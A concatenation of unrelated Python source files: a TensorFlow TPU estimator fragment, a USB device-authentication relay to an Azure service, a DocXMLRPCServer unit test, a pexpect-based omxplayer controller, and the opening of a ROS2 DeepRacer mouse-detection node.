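#   dict's values ([t]); ClassificationOutput(scores=s, classes=c) yields
#   [s, c]; RegressionOutput(value=v) yields [v].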
def _clone_export_output_with_tensors(export_output, tensors):
"""Clones `export_output` but with new `tensors`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
tensors: a list of `Tensors` used to construct a new `export_output`.
Returns:
A dict similar to `export_output` but with `tensors`.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
if len(tensors) != 2:
raise ValueError('tensors must be of length 2; '
'got {}.'.format(len(tensors)))
return export_output_lib.ClassificationOutput(*tensors)
elif isinstance(export_output, export_output_lib.RegressionOutput):
if len(tensors) != 1:
raise ValueError('tensors must be of length 1; '
'got {}'.format(len(tensors)))
return export_output_lib.RegressionOutput(*tensors)
elif isinstance(export_output, export_output_lib.PredictOutput):
return export_output_lib.PredictOutput(
dict(zip(export_output.outputs.keys(), tensors)))
else:
raise ValueError(
'`export_output` must have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
single_tpu_eval_step, host_calls, captured_scaffold_fn = (
model_fn_wrapper.convert_to_single_tpu_eval_step(dequeue_fn))
def multi_tpu_eval_steps_on_single_shard():
return training_loop.repeat(
iterations_per_loop_var,
single_tpu_eval_step, [_ZERO_LOSS])
(loss,) = tpu.shard(
multi_tpu_eval_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
scaffold = _get_scaffold(captured_scaffold_fn)
return loss, host_calls, scaffold
def _train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
single_tpu_train_step, host_call, captured_scaffold_fn = (
model_fn_wrapper.convert_to_single_tpu_train_step(dequeue_fn))
def multi_tpu_train_steps_on_single_shard():
return training_loop.repeat(
iterations_per_loop_var,
single_tpu_train_step, [_INITIAL_LOSS])
(loss,) = tpu.shard(
multi_tpu_train_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
scaffold = _get_scaffold(captured_scaffold_fn)
return loss, host_call, scaffold
def _predict_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
num_cores = ctx.num_cores
single_tpu_predict_step, host_calls, captured_scaffold_fn = (
model_fn_wrapper.convert_to_single_tpu_predict_step(dequeue_fn))
def multi_tpu_predict_steps_on_single_shard():
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
inputs = [_StopSignals.NON_STOPPING_SIGNAL]
outputs = training_loop.while_loop(
cond, single_tpu_predict_step, inputs=inputs, name=b'loop')
return outputs
(dummy_predict_op,) = tpu.shard(
multi_tpu_predict_steps_on_single_shard,
inputs=[],
num_shards=num_cores,
outputs_from_all_shards=False)
scaffold = _get_scaffold(captured_scaffold_fn)
return dummy_predict_op, host_calls, scaffold
def _wrap_computation_in_while_loop(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def computation(i):
with ops.control_dependencies(op_fn()):
return i + 1
iterations_per_loop_var = _create_or_get_iterations_per_loop()
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
iterations = array_ops.identity(iterations_per_loop_var)
return control_flow_ops.while_loop(
lambda i: i < iterations,
computation, [constant_op.constant(0)],
parallel_iterations=1)
def _wrap_computation_in_while_loop_with_stopping_signals(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
def computation(unused_scalar_stopping_signal):
return_value = op_fn()
execute_ops = return_value['ops']
signals = return_value['signals']
with ops.control_dependencies(execute_ops):
return _StopSignals.as_scalar_stopping_signal(signals)
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
return control_flow_ops.while_loop(
cond,
computation, [_StopSignals.NON_STOPPING_SIGNAL],
parallel_iterations=1)
def _validate_tpu_training_graph():
"""Validate graph before running distributed training.
Raises:
ValueError: If the graph seems invalid for running on device
"""
operations = ops.get_default_graph().get_operations()
# Check if there is at least one CrossReplicaSum operation in the graph.
# This should be introduced by using the CrossShardOptimizer wrapper
cross_replica_sum_ops = [
o for o in operations if o.type == _CROSS_REPLICA_SUM_OP
]
if not cross_replica_sum_ops:
raise ValueError(
'CrossShardOptimizer must be used for model training on TPUs.')
class _CapturedObject(object):
"""A placeholder to capture an object.
This is useful when we need to capture a Python object in the TensorFlow
control flow body function and use it outside the control flow.
"""
def __init__(self):
self._object = None
self._captured = False
def capture(self, o):
if self._captured:
raise RuntimeError(
'InternalError: Object can be captured only once. Please file a bug.')
self._captured = True
self._object = o
def get(self):
if not self._captured:
raise RuntimeError(
'InternalError: Object is not captured properly before `get`. '
'Please file a bug.')
return self._object
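# Example (sketch, not part of the original code): the typical capture
# pattern used elsewhere in this file.
#
#   capture = _CapturedObject()
#
#   def computation():
#     spec = ...                 # build something inside the traced function
#     capture.capture(spec)      # stash the Python object for later
#     return spec.loss           # only Tensors can cross the boundary
#
#   tpu.rewrite_for_inference(computation)
#   spec = capture.get()         # retrieve the captured object afterwards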
def _get_scaffold(captured_scaffold_fn):
"""Retrieves the Scaffold from `captured_scaffold_fn`."""
with _CapturingContext(message='Inside scaffold_fn'):
scaffold_fn = captured_scaffold_fn.get()
if scaffold_fn:
scaffold = scaffold_fn()
if scaffold is None:
raise ValueError(
'TPUEstimatorSpec.scaffold_fn returns None, which is not allowed')
else:
scaffold = None
if scaffold:
wrapped_finalize = scaffold.finalize
def _finalize():
with _CapturingContext('Inside Scaffold.finalize'):
wrapped_finalize()
scaffold.finalize = _finalize
return scaffold
class _CapturingContext(control_flow_ops.ControlFlowContext):
"""Tracks references to Tensors defined in TPU replication."""
def __init__(self, message):
control_flow_ops.ControlFlowContext.__init__(self)
self._message = message
def AddOp(self, op): # pylint: disable=invalid-name
for c in op.inputs:
if tpu._TPU_REPLICATE_ATTR in c.op.node_def.attr: # pylint: disable=protected-access
raise ValueError('{}: Op {} depends on TPU computation {}, '
'which is not allowed.'.format(self._message, op, c))
def __enter__(self):
# pylint: disable=protected-access
self._g = ops.get_default_graph()
self._old = self._g._get_control_flow_context()
self._g._set_control_flow_context(self)
# pylint: enable=protected-access
def __exit__(self, _, __, ___): # pylint: disable=invalid-name
self._g._set_control_flow_context(self._old) # pylint: disable=protected-access
class _Inputs(object):
"""A data structure representing the input_fn returned values.
This also supports the returned value from input_fn as `Dataset`.
"""
def __init__(self, features=None, labels=None, dataset=None, signals=None):
if dataset is not None and (features is not None or labels is not None or
signals is not None):
raise RuntimeError('Internal Error: Either (features and labels) or '
'dataset should be provided, not both. Please file '
'a bug.')
self._features = features
self._labels = labels
self._signals = signals
self._dataset = dataset
self._iterator = None
@staticmethod
def from_input_fn(return_values):
"""Returns an `_Inputs` instance according to `input_fn` return value."""
if isinstance(return_values, dataset_ops.Dataset):
dataset = return_values
return _Inputs(dataset=dataset)
features, labels = _Inputs._parse_inputs(return_values)
return _Inputs(features, labels)
@staticmethod
def _parse_inputs(return_values):
if isinstance(return_values, tuple):
features, labels = return_values
else:
features, labels = return_values, None
return features, labels
@property
def is_dataset(self):
"""Returns True if the return value from input_fn is Dataset."""
return self._dataset is not None
def dataset_initializer_hook(self):
"""Returns a `SessionRunHook` to initialize this dataset.
This must be called before `features_and_labels`.
"""
iterator = self._dataset.make_initializable_iterator()
# pylint: disable=protected-access
hook = estimator_util._DatasetInitializerHook(iterator)
# pylint: enable=protected-access
self._iterator = iterator
return hook
def features_and_labels(self):
"""Gets `features` and `labels`."""
if self.is_dataset:
if self._iterator is None:
raise RuntimeError('Internal error: Must call dataset_initializer_hook '
'before calling features_and_labels(). Please file '
'a bug!')
return _Inputs._parse_inputs(self._iterator.get_next())
return (self._features, self._labels)
def signals(self):
return self._signals
@property
def dataset(self):
return self._dataset
class _InputsWithStoppingSignals(_Inputs):
"""Inputs with `_StopSignals` inserted into the dataset."""
def __init__(self, dataset, batch_size, add_padding=False):
assert dataset is not None
user_provided_dataset = dataset.map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=False, batch_size=batch_size, add_padding=add_padding))
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
dataset = user_provided_dataset.concatenate(final_batch_dataset).prefetch(2)
super(_InputsWithStoppingSignals, self).__init__(dataset=dataset)
self._current_inputs = None
def features_and_labels(self):
if self._current_inputs is not None:
raise RuntimeError(
'Internal Error: The previous inputs have not been properly '
'consumed. First call features_and_labels, then call signals.')
inputs_with_signals = self._iterator.get_next()
features = inputs_with_signals['features']
labels = inputs_with_signals.get('labels')
self._current_inputs = inputs_with_signals
return features, labels
def signals(self):
"""Returns the `Signals` from `_Inputs`."""
if self._current_inputs is None:
raise RuntimeError(
'Internal Error: The current inputs have not been properly '
'generated. First call features_and_labels, then call signals.')
signals = self._current_inputs['signals']
self._current_inputs = None
return signals
@staticmethod
def insert_stopping_signal(stop, batch_size, add_padding=False):
"""Inserts stopping_signal into dataset via _map_fn.
Here we change the data structure in the dataset, such that the return value
is now a dictionary and `features`, `labels`, and `signals` are three
distinct keys in that dict. This provides a better structure, which
makes it easier to decompose the inputs (see `features_and_labels`).
Args:
stop: bool, state of current stopping signals.
batch_size: int, batch size.
add_padding: bool, whether to pad the tensor to full batch size.
Returns:
A map_fn passed to dataset.map API.
"""
def _map_fn(*args):
"""The map fn to insert signals."""
if len(args) == 1:
# Unpack the single Tensor/dict argument as features. This is required
# when the input_fn returns no labels.
args = args[0]
features, labels = _Inputs._parse_inputs(args)
new_input_dict = {}
if add_padding:
padding_mask, features, labels = (
_PaddingSignals.pad_features_and_labels(
features, labels, batch_size))
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
else:
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
padding_mask = None
new_input_dict['signals'] = _StopSignals(
stop=stop, batch_size=batch_size, padding_mask=padding_mask).as_dict()
return new_input_dict
return _map_fn
class _StopSignals(object):
"""Signals class holding all logic to handle TPU stopping condition."""
NON_STOPPING_SIGNAL = False
STOPPING_SIGNAL = True
def __init__(self, stop, batch_size, padding_mask=None):
self._stop = stop
self._batch_size = batch_size
self._padding_mask = padding_mask
def as_dict(self):
"""Returns the signals as Python dict."""
shape = [self._batch_size, 1]
dtype = dtypes.bool
if self._stop:
stopping = array_ops.ones(shape=shape, dtype=dtype)
else:
stopping = array_ops.zeros(shape=shape, dtype=dtype)
signals = {'stopping': stopping}
if self._padding_mask is not None:
signals['padding_mask'] = self._padding_mask
return signals
@staticmethod
def as_scalar_stopping_signal(signals):
return array_ops.identity(signals['stopping'][0][0])
@staticmethod
def should_stop(scalar_stopping_signal):
if isinstance(scalar_stopping_signal, ops.Tensor):
# STOPPING_SIGNAL is a constant True. Here, the logical_and is just the TF
# way to express the bool check whether scalar_stopping_signal is True.
return math_ops.logical_and(
scalar_stopping_signal, _StopSignals.STOPPING_SIGNAL)
else:
# For the non-Tensor case, it is used in a SessionRunHook. So, we cannot modify
# the graph anymore. Here, we use pure Python.
return bool(scalar_stopping_signal)
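# Example (sketch, not part of the original code): should_stop() accepts both
# forms of the stopping signal.
#   _StopSignals.should_stop(True)          # -> True (plain Python, in hooks)
#   _StopSignals.should_stop(stop_tensor)   # -> a bool Tensor for graph code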
class _PaddingSignals(object):
"""Signals class holding all logic to handle padding."""
@staticmethod
def pad_features_and_labels(features, labels, batch_size):
"""Pads out the batch dimension of features and labels."""
real_batch_size = array_ops.shape(
_PaddingSignals._find_any_tensor(features))[0]
batch_size_tensor = constant_op.constant(batch_size, dtypes.int32)
check_greater = check_ops.assert_greater_equal(
batch_size_tensor, real_batch_size,
data=(batch_size_tensor, real_batch_size),
message='The real batch size should not be greater than batch_size.')
with ops.control_dependencies([check_greater]):
missing_count = batch_size_tensor - real_batch_size
def pad_single_tensor(tensor):
"""Pads out the batch dimension of a tensor to the complete batch_size."""
rank = len(tensor.shape)
assert rank > 0
padding = array_ops.stack([[0, missing_count]] + [[0, 0]] * (rank - 1))
padded_shape = (batch_size,) + tuple(tensor.shape[1:])
padded_tensor = array_ops.pad(tensor, padding)
padded_tensor.set_shape(padded_shape)
return padded_tensor
def nest_pad(tensor_or_dict):
return nest.map_structure(pad_single_tensor, tensor_or_dict)
features = nest_pad(features)
if labels is not None:
labels = nest_pad(labels)
padding_mask = _PaddingSignals._padding_mask(
real_batch_size, missing_count, batch_size)
return padding_mask, features, labels
@staticmethod
def slice_tensor_or_dict(tensor_or_dict, signals):
"""Slice the real Tensors according to padding mask in signals."""
padding_mask = signals['padding_mask']
batch_size = array_ops.shape(padding_mask)[0]
def verify_batch_size(tensor):
check_batch_size = math_ops.equal(batch_size, tensor.shape[0])
with ops.control_dependencies([check_batch_size]):
return array_ops.identity(tensor)
def slice_single_tensor(tensor):
rank = len(tensor.shape)
assert rank > 0
real_batch_size = batch_size - math_ops.reduce_sum(padding_mask)
return verify_batch_size(tensor)[0:real_batch_size]
# As we split the Tensors to all TPU cores and concat them back, it is
# important to ensure the real data is placed before the padded data, i.e.,
# that order is preserved. Given that, the sliced padding mask should be all
# 0's. If this assertion fails, the slice logic here would not hold.
sliced_padding_mask = slice_single_tensor(padding_mask)
assert_padding_mask = math_ops.equal(
math_ops.reduce_sum(sliced_padding_mask), 0)
with ops.control_dependencies([assert_padding_mask]):
should_stop = _StopSignals.should_stop(
_StopSignals.as_scalar_stopping_signal(signals))
is_full_batch = math_ops.equal(math_ops.reduce_sum(padding_mask), 0)
def slice_fn(tensor):
# If the current batch is full batch or part of stopping signals, we do
# not need to slice to save performance.
return control_flow_ops.cond(
math_ops.logical_or(should_stop, is_full_batch),
(lambda: verify_batch_size(tensor)),
(lambda: slice_single_tensor(tensor)))
return nest.map_structure(slice_fn, tensor_or_dict)
@staticmethod
def _find_any_tensor(batch_features):
tensors = [x for x in nest.flatten(batch_features)
if isinstance(x, ops.Tensor)]
if not tensors:
raise ValueError('Cannot find any Tensor in features dict.')
return tensors[0]
@staticmethod
def _padding_mask(real_batch_size, missing_count, batch_size):
padding_mask = array_ops.concat(
[
array_ops.zeros((real_batch_size,), dtype=dtypes.int32),
array_ops.ones((missing_count,), dtype=dtypes.int32)
],
axis=0)
padding_mask.set_shape((batch_size,))
return padding_mask
class _SignalsHelper(object):
"""A general helper class to handle common signals manipulation."""
def __init__(self, signals):
self._signal_keys = []
for key in sorted(signals):
self._signal_keys.append(key)
@property
def num_signals(self):
return len(self._signal_keys)
def unflatten(self, tensor_list):
return dict(zip(self._signal_keys, tensor_list))
@staticmethod
def as_tensor_list(signals):
return [signals[key] for key in sorted(signals)]
def _verify_cross_hosts_transfer_size(tensor_dict, message):
total_size = 0
tensor_structure = {}
for key, tensor in tensor_dict.items():
shape = tensor.shape
size = np.product(shape) * tensor.dtype.size
tensor_structure[key] = shape
total_size += size
if total_size >= _ONE_GIGABYTE:
raise ValueError(
'{} The transfer size is larger than the protobuf limit. Please '
'consider using Tensors with smaller shapes or reducing the batch '
'size. Given:\n'
'{}'.format(message, '\n'.join([
' -- Key: {}, Shape: {}'.format(k, v)
for k, v in tensor_structure.items()])))
def _add_item_to_params(params, key, value):
"""Adds a new item into `params`."""
if isinstance(params, hparam.HParams):
# For HParams, we need to use the special API.
if key in params:
params.set_hparam(key, value)
else:
params.add_hparam(key, value)
else:
# Now params is Python dict.
params[key] = value
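# Example behaviour of _add_item_to_params (for reference; not part of the
# original code):
#   params = {'learning_rate': 0.1}
#   _add_item_to_params(params, 'batch_size', 128)
#   # params == {'learning_rate': 0.1, 'batch_size': 128}
# For `HParams` objects the value is added with add_hparam() when the key is
# new and overwritten with set_hparam() when it already exists.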
|
_device_authentication.py
|
import _hardware
import usb.core
import usb.util
import socket
import time
import sys
import threading
class DeviceAuthentication:
def __init__(self, vid, pid):
self.auth_url = "auth.projectsantacruz.azure.net"
self.vid = vid
self.pid = pid
self.write_endpoint = 0x01
self.read_endpoint = 0x81
self.is_authenticated = False
self._current_data = None
self._previous_data = None
self._current = b''
self._is_listening = True
self._active_thread = False
self._s = socket.socket()
def _call_service(self, arr):
msg_bytes = bytearray(arr)
self._s.send(msg_bytes)
def _send_to_usb(self, dev, data_bytes):
msg = [x for x in data_bytes]
# print(f"Msg length: {len(msg)}")
# print("Write:", msg, dev.write(self.write_endpoint, msg))
dev.write(self.write_endpoint, msg)
time.sleep(1)
read_msg = dev.read(self.read_endpoint, 5120)
# print("Read:", read_msg)
# print(len(read_msg))
return read_msg
def _listen_service(self, max_length=4096):
# print("Start listening...")
while self._is_listening:
received = self._s.recv(max_length)
# print(f"Received from webservice: {received}")
self._current += received
if self._active_thread is False:
t = threading.Thread(target=self._set_received_data)
t.daemon = True
t.start()
self._active_thread = True
def _set_received_data(self):
# print("Thread started")
timestamp = time.time()
while True:
if time.time() > timestamp + 2:
# print("Data received fully")
self._previous_data = self._current_data
self._current_data = self._current
self._current = b''
self._active_thread = False
return
def start_authentication(self):
self._s.connect((self.auth_url, 443))
self._l_thread = threading.Thread(target=self._listen_service, args=(4096,))
self._l_thread.daemon = True
self._l_thread.start()
# This is for audio/ear SoM
dev = usb.core.find(idVendor=self.vid, idProduct=self.pid)
if dev is None:
raise ValueError('Device not found')
# print(dev)
if dev.is_kernel_driver_active(0):
try:
dev.detach_kernel_driver(0)
# print("Kernel driver detached")
except usb.core.USBError as e:
sys.exit("Could not detach kernel driver: ")
try:
dev.set_configuration()
except usb.core.USBError:
print("ERROR: USB SoM is busy")
exit(1)
msg = [0x77, 0x01]
# print("Write:", msg, dev.write(self.write_endpoint, msg))
dev.write(self.write_endpoint, msg)
read_msg = dev.read(self.read_endpoint, 5120)
# print("Read:", read_msg)
# print(len(read_msg))
while True:
if read_msg[1] == 4:
print("Authentication failed")
self._is_listening = False
self._s.shutdown(socket.SHUT_RDWR)
self._s.close()
# self._l_thread.join()
sys.exit()
elif read_msg[1] == 5:
# print("Authentication successful!")
self.is_authenticated = True
self._is_listening = False
self._s.shutdown(socket.SHUT_RDWR)
self._s.close()
# self._l_thread.join()
sys.exit()
elif read_msg[1] == 2:
# print(f"Call Webservice (2)")
self._call_service(read_msg[2:])
time.sleep(1)
read_msg = dev.read(self.read_endpoint, 5120)
continue
elif read_msg[1] == 3:
# print("Data from USB sensor:")
# print(read_msg)
time.sleep(3)
expected_length = int.from_bytes(read_msg[2:], byteorder='little', signed=False)
# print(f"Expected length: {expected_length}")
read_msg = self._send_to_usb(dev, self._current_data[:expected_length])
self._current_data = self._current_data[expected_length:]
time.sleep(1)
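# Example usage (illustrative sketch only; not part of the original module).
# The vendor/product IDs below are placeholders -- substitute the real USB
# SoM identifiers before running.
if __name__ == "__main__":
    EXAMPLE_VID = 0x045E  # hypothetical vendor id
    EXAMPLE_PID = 0x066F  # hypothetical product id
    device_auth = DeviceAuthentication(EXAMPLE_VID, EXAMPLE_PID)
    # start_authentication() blocks until the exchange completes and then
    # exits the process; is_authenticated is set beforehand on success.
    device_auth.start_authentication()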
|
test_docxmlrpc.py
|
from DocXMLRPCServer import DocXMLRPCServer
import httplib
import socket
from test import test_support
import threading
import time
import unittest
import xmlrpclib
PORT = None
def server(evt, numrequests):
serv = DocXMLRPCServer(("localhost", 0), logRequests=False)
try:
global PORT
PORT = serv.socket.getsockname()[1]
# Add some documentation
serv.set_server_title("DocXMLRPCServer Test Documentation")
serv.set_server_name("DocXMLRPCServer Test Docs")
serv.set_server_documentation(
"""This is an XML-RPC server's documentation, but the server can be used by
POSTing to /RPC2. Try self.add, too.""")
# Create and register classes and functions
class TestClass(object):
def test_method(self, arg):
"""Test method's docs. This method truly does very little."""
self.arg = arg
serv.register_introspection_functions()
serv.register_instance(TestClass())
def add(x, y):
"""Add two instances together. This follows PEP008, but has nothing
to do with RFC1952. Case should matter: pEp008 and rFC1952. Things
that start with http and ftp should be auto-linked, too:
http://google.com.
"""
return x + y
serv.register_function(add)
serv.register_function(lambda x, y: x-y)
while numrequests > 0:
serv.handle_request()
numrequests -= 1
except socket.timeout:
pass
finally:
serv.server_close()
PORT = None
evt.set()
class DocXMLRPCHTTPGETServer(unittest.TestCase):
def setUp(self):
# Enable server feedback
DocXMLRPCServer._send_traceback_header = True
self.evt = threading.Event()
threading.Thread(target=server, args=(self.evt, 1)).start()
# wait for port to be assigned
n = 1000
while n > 0 and PORT is None:
time.sleep(0.001)
n -= 1
self.client = httplib.HTTPConnection("localhost:%d" % PORT)
def tearDown(self):
self.client.close()
self.evt.wait()
# Disable server feedback
DocXMLRPCServer._send_traceback_header = False
def test_valid_get_response(self):
self.client.request("GET", "/")
response = self.client.getresponse()
self.assertEqual(response.status, 200)
self.assertEqual(response.getheader("Content-type"), "text/html")
# Server throws an exception if we don't start to read the data
response.read()
def test_invalid_get_response(self):
self.client.request("GET", "/spam")
response = self.client.getresponse()
self.assertEqual(response.status, 404)
self.assertEqual(response.getheader("Content-type"), "text/plain")
response.read()
def test_lambda(self):
"""Test that lambda functionality stays the same. The output produced
currently is, I suspect invalid because of the unencoded brackets in the
HTML, "<lambda>".
The subtraction lambda method is tested.
"""
self.client.request("GET", "/")
response = self.client.getresponse()
self.assert_(
"""<dl><dt><a name="-<lambda>"><strong><lambda></strong></a>(x, y)</dt></dl>"""
in response.read())
def test_autolinking(self):
"""Test that the server correctly automatically wraps references to PEPS
and RFCs with links, and that it linkifies text starting with http or
ftp protocol prefixes.
The documentation for the "add" method contains the test material.
"""
self.client.request("GET", "/")
response = self.client.getresponse()
self.assert_( # This is ugly ... how can it be made better?
"""<dl><dt><a name="-add"><strong>add</strong></a>(x, y)</dt><dd><tt>Add two instances together. This follows <a href="http://www.python.org/dev/peps/pep-0008/">PEP008</a>, but has nothing<br>\nto do with <a href="http://www.rfc-editor.org/rfc/rfc1952.txt">RFC1952</a>. Case should matter: pEp008 and rFC1952. Things<br>\nthat start with http and ftp should be auto-linked, too:<br>\n<a href="http://google.com">http://google.com</a>.</tt></dd></dl>"""
in response.read())
def test_system_methods(self):
"""Test the precense of three consecutive system.* methods.
This also tests their use of parameter type recognition and the systems
related to that process.
"""
self.client.request("GET", "/")
response = self.client.getresponse()
self.assert_(
"""<dl><dt><a name="-system.listMethods"><strong>system.listMethods</strong></a>()</dt><dd><tt><a href="#-system.listMethods">system.listMethods</a>() => [\'add\', \'subtract\', \'multiple\']<br>\n <br>\nReturns a list of the methods supported by the server.</tt></dd></dl>\n <dl><dt><a name="-system.methodHelp"><strong>system.methodHelp</strong></a>(method_name)</dt><dd><tt><a href="#-system.methodHelp">system.methodHelp</a>(\'add\') => "Adds two integers together"<br>\n <br>\nReturns a string containing documentation for the specified method.</tt></dd></dl>\n <dl><dt><a name="-system.methodSignature"><strong>system.methodSignature</strong></a>(method_name)</dt><dd><tt><a href="#-system.methodSignature">system.methodSignature</a>(\'add\') => [double, int, int]<br>\n <br>\nReturns a list describing the signature of the method. In the<br>\nabove example, the add method takes two integers as arguments<br>\nand returns a double result.<br>\n <br>\nThis server does NOT support system.methodSignature.</tt></dd></dl>"""
in response.read())
def test_autolink_dotted_methods(self):
"""Test that selfdot values are made strong automatically in the
documentation."""
self.client.request("GET", "/")
response = self.client.getresponse()
self.assert_("""Try self.<strong>add</strong>, too.""" in
response.read())
def test_main():
test_support.run_unittest(DocXMLRPCHTTPGETServer)
if __name__ == '__main__':
test_main()
|
__init__.py
|
import re
from threading import Thread
from time import sleep
import pexpect
from pyomxplayer.parser import OMXPlayerParser
class OMXPlayer(object):
_STATUS_REGEX = re.compile(r'M:\s*([\d.]+).*')
_DONE_REGEX = re.compile(r'have a nice day.*')
_DURATION_REGEX = re.compile(r'Duration: (.+?):(.+?):(.+?),')
_LAUNCH_CMD = 'omxplayer -s %s %s'
_INFO_CMD = 'omxplayer -i %s'
_PAUSE_CMD = 'p'
_TOGGLE_SUB_CMD = 's'
_INC_SPEED_CMD = '1'
_DEC_SPEED_CMD = '2'
_PREV_AUDIO_CMD = 'j'
_NEXT_AUDIO_CMD = 'k'
_PREV_SUB_CMD = 'n'
_NEXT_SUB_CMD = 'm'
_QUIT_CMD = 'q'
_PREVIOUS_CMD = 'i'
_NEXT_CMD = 'o'
_DECREASE_VOLUME = '-'
_INCREASE_VOLUME = '+'
_BACK_30_CMD = '\x1b[D' #left
_BACK_600_CMD = '\x1b[B' #down
_FORWARD_30_CMD = '\x1b[C' #right
_FORWARD_600_CMD = '\x1b[A' #up
def __init__(self, media_file, args=None, start_playback=False,
_parser=OMXPlayerParser, _spawn=pexpect.spawn, stop_callback=None):
self.subtitles_visible = True
self._spawn = _spawn
self._launch_omxplayer(media_file, args)
self.parser = _parser(self._process)
self.duration = self._get_duration()
self._info_process.terminate()
self._monitor_play_position()
self._stop_callback = stop_callback
# By default the process starts playing
self.paused = False
if not start_playback:
self.toggle_pause()
self.toggle_subtitles()
def _launch_omxplayer(self, media_file, args):
if not args:
args = ''
cmd = self._LAUNCH_CMD % (media_file, args)
self._process = self._spawn(cmd)
info_cmd = self._INFO_CMD % (media_file)
self._info_process = self._spawn(info_cmd)
def _monitor_play_position(self):
self._position_thread = Thread(target=self._get_position)
self._position_thread.start()
def _get_duration(self):
output = self._info_process.read()
matches = self._DURATION_REGEX.search(output)
if matches:
duration_info = matches.groups()
hours = int(re.sub('\x1b.*?m', '', duration_info[0]))
minutes = int(re.sub('\x1b.*?m', '', duration_info[1]))
seconds = float(re.sub('\x1b.*?m', '', duration_info[2]))
return int(hours*60*60*1000000 + minutes*60*1000000 + seconds*1000000)
else:
return 0
def _get_position(self):
while True:
index = self._process.expect([self._STATUS_REGEX,
pexpect.TIMEOUT,
pexpect.EOF,
self._DONE_REGEX])
def timed_out():
return index == 1
def process_finished():
return index in (2, 3)
if timed_out():
continue
elif process_finished():
if index == 3 and hasattr(self._stop_callback, '__call__'):
self._stop_callback()
break
else:
# Process is still running (happy path)
self.position = float(self._process.match.group(1)) / 1000000
sleep(0.05)
def is_running(self):
return self._process.isalive()
def toggle_pause(self):
if self._process.send(self._PAUSE_CMD):
self.paused = not self.paused
def toggle_subtitles(self):
if self._process.send(self._TOGGLE_SUB_CMD):
self.subtitles_visible = not self.subtitles_visible
def stop(self):
self._process.send(self._QUIT_CMD)
self._process.terminate(force=True)
def inc_speed(self):
self._process.send(self._INC_SPEED_CMD)
def dec_speed(self):
self._process.send(self._DEC_SPEED_CMD)
def prev_audio(self):
self._process.send(self._PREV_AUDIO_CMD)
def next_audio(self):
self._process.send(self._NEXT_AUDIO_CMD)
def prev_sub(self):
self._process.send(self._PREV_SUB_CMD)
def next_sub(self):
self._process.send(self._NEXT_SUB_CMD)
def previous_chapter(self):
self._process.send(self._PREVIOUS_CMD)
def next_chapter(self):
self._process.send(self._NEXT_CMD)
def back_30(self):
self._process.send(self._BACK_30_CMD)
def back_600(self):
self._process.send(self._BACK_600_CMD)
def forward_30(self):
self._process.send(self._FORWARD_30_CMD)
def forward_600(self):
self._process.send(self._FORWARD_600_CMD)
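# Example usage (illustrative sketch only; not part of the original module).
# Assumes omxplayer is installed and '/path/to/video.mp4' is a real file.
if __name__ == '__main__':
    player = OMXPlayer('/path/to/video.mp4', start_playback=True)
    sleep(10)              # let the video play for a while
    player.toggle_pause()  # pause playback
    sleep(2)
    player.toggle_pause()  # resume playback
    player.stop()          # quit omxplayer and terminate the child process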
|
mouse_detection_node.py
|
#################################################################################
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. #
# Modifications Copyright Martin Paradesi. All Rights Reserved. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"). #
# You may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
#################################################################################
"""
mouse_detection_node.py
This module creates the mouse_detection_node, which is responsible for collecting
sensor data (camera images) from sensor_fusion_pkg, running motion detection
on a specified object, and providing an action trigger for rc_navigation_pkg.
The node defines:
image_subscriber: A subscriber to the /sensor_fusion_pkg/sensor_msg published
by the sensor_fusion_pkg with sensor data.
mouse_publisher: A publisher to publish whether a mouse was detected or not.
"""
import time
import signal
import threading
import cv2
import numpy as np
import rclpy
from rclpy.node import Node
from rclpy.executors import MultiThreadedExecutor
from rclpy.qos import (QoSProfile,
QoSHistoryPolicy,
QoSReliabilityPolicy)
from cv_bridge import CvBridge
from sensor_msgs.msg import Image
from deepracer_interfaces_pkg.msg import (EvoSensorMsg,
MouseDetectionMsg)
from mouse_detection_pkg import (constants,
utils)
class MouseDetectionNode(Node):
"""Node responsible for collecting sensor data (camera images) from sensor_fusion_pkg
and running motion detection on the mouse object, providing an action trigger for rc_navigation_pkg.
"""
def __init__(self, qos_profile):
"""Create a MouseDetectionNode.
"""
super().__init__('mouse_detection_node')
self.get_logger().info("mouse_detection_node started.")
# Initialize variables
self.previous_sensor_data = np.zeros(shape=(3,480,640))
self.current_sensor_data = np.zeros(shape=(3,480,640))
self.h = 480
self.w = 640
self.mouse_flag = False
